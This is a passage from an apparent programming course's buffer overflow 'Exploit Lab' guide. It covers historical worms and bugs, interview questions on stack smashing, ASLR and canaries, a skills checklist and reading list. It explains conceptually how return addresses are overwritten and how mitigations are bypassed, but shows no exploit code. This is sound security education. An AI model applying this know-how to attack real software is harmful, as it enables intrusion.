  • Exploited buffer overflow in fingerd
  • Infected an estimated 6,000 machines, about 10% of the internet at the time

Code Red (2001):

  • Buffer overflow in IIS web server
  • Infected 359,000 servers in 14 hours
  • An estimated $2.6 billion in damages

Heartbleed (2014):

  • Buffer over-read (not overflow) in OpenSSL
  • Could read server memory including private keys
  • Affected an estimated 17% of "secure" (SSL/TLS) web servers

Stagefright (2015):

  • Buffer overflow in Android media framework
  • Exploitable via MMS message
  • Affected 950 million devices

Why This Still Matters

  • Roughly 70% of the security vulnerabilities Microsoft assigns CVEs for, and about 70% of serious Chromium security bugs, are memory safety issues
  • C and C++ still power: operating systems, browsers, databases, embedded systems
  • New vulnerabilities found constantly despite decades of awareness
  • Understanding attacks is essential for defense

Interview Preparation

Common Questions

  1. "What is a buffer overflow? How does it lead to code execution?"
    • Buffer: fixed-size memory region
    • Overflow: writing beyond buffer's boundary
    • On stack: can overwrite return address
    • Return address controls next instruction pointer
    • Attacker provides address → controls execution
  2. "Walk me through how a stack-based buffer overflow works."
    • Function allocates buffer on stack
    • Unsafe copy (strcpy, gets) doesn't check bounds
    • Attacker input larger than buffer
    • Overflow overwrites saved RBP, then return address
    • Function returns to attacker-specified address
  3. "What is ASLR? How does it protect against exploits?"
    • Address Space Layout Randomization
    • Randomizes where code, libraries, stack, heap are loaded
    • Attacker can't predict addresses to jump to
    • Broken by: info leaks, brute force, relative addressing
  4. "What are stack canaries? How do they work?"
    • Random value placed between buffer and return address
    • Checked before function returns
    • Overflow must corrupt canary to reach return address
    • Wrong canary value → abort instead of return
    • Broken by: info leak revealing canary, overwrite without hitting it
  5. "What's the difference between a stack overflow and a buffer overflow?"
    • Stack overflow: ran out of stack space (deep recursion)
    • Buffer overflow: wrote beyond buffer boundary
    • Both involve the stack but different issues
    • Stack overflow usually crashes immediately
    • Buffer overflow often silently corrupts
  6. "Why is gets() so dangerous? What should you use instead?"
    • gets() has no length parameter, reads until newline
    • Can't prevent overflow, no matter buffer size
    • Removed from the C standard in C11
    • Use: fgets(buffer, size, stdin) or better APIs

Self-Assessment Checklist

Understanding (Can You Explain?)

  • Stack frame layout: locals, saved RBP, return address
  • Why arrays growing up + stack growing down enables overflow
  • What the ret instruction does and why it's exploitable
  • How ASLR, stack canaries, and DEP/NX protect
  • Little-endian byte order for addresses
  • Why compiler flags affect exploitability

Implementation (Can You Build?)

  • Level 1: Variable overwrite with exact magic value
  • Level 2: Return address overwrite to call win()
  • Exploit scripts that work reliably
  • lldb session demonstrating corruption

Analysis (Can You Analyze?)

  • Calculate exact offset from buffer to target
  • Read AddressSanitizer output and understand it
  • Identify vulnerable patterns in code
  • Explain what mitigations would prevent specific exploits

Documentation (Can You Communicate?)

  • Write-up with clear diagrams
  • Step-by-step exploit development
  • Real-world impact discussion
  • lldb session logs with annotations

Resources

Books

Topic | Book | Chapter
Buffer overflow fundamentals | "Hacking: The Art of Exploitation" by Jon Erickson | Ch. 3
Stack layout and assembly | "Computer Systems: A Programmer's Perspective" | Ch. 3.7-3.10
Exploit development | "The Shellcoder's Handbook" | Ch. 1-5
Memory corruption attacks | "Practical Binary Analysis" by Dennis Andriesse | Ch. 10
Modern mitigations | "Secure Coding in C and C++" by Robert Seacord | Ch. 2-3


Summary

The Exploit Lab transforms abstract concepts into concrete reality:

  1. "Undefined behavior" becomes "I overwrote the return address"
  2. "Security vulnerability" becomes "I redirected execution"
  3. "Memory safety" becomes "this is why it matters"

After completing this project:

  • You'll viscerally understand why buffer overflows are dangerous
  • You'll know exactly what stack canaries, ASLR, and DEP protect against
  • You'll read CVE reports and understand the mechanics
  • You'll write more secure code because you've seen what attacks look like

This knowledge is the foundation for:

  • Security engineering
  • Vulnerability research
  • Secure software development
  • Understanding why modern languages emphasize memory safety

Most importantly: You'll never look at a strcpy the same way again.


Next Project: P06: Mini Text Editor (Capstone) - Apply everything you've learned to build a real, usable application with complex memory management.